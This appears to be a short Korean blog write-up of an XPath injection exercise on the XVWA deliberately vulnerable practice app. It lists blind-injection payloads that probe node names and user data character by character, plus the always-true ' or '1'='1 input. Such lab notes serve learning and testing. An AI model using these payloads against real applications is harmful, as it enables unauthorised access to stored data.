XVWA Xpath Injection
[그림 1]
Summary
[그림1] 는 Xpath Injection 공격을 시도해 볼 수 있도록 개발된 폼을 제공하고 있습니다.
Description
' or substring(name(parent::*[position()=1]),1,1)='A
' or substring(name(parent::*[position()=1]),1,1)='B
' or substring(name(parent::*[position()=1]),1,1)='C
노드 대입을 통한 결과 다음과 같이 Xpath 에 취약한 결과가 나오는것을 확인할수있습니다.
' or '1'='1 주입결과.
Steps to reproduce
1. ' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''='
Source Code
Impact
공격자는 Xpath Query 주입을 통해 액세스 할 수없는 데이터에 접근할수있습니다.
댓글
댓글 쓰기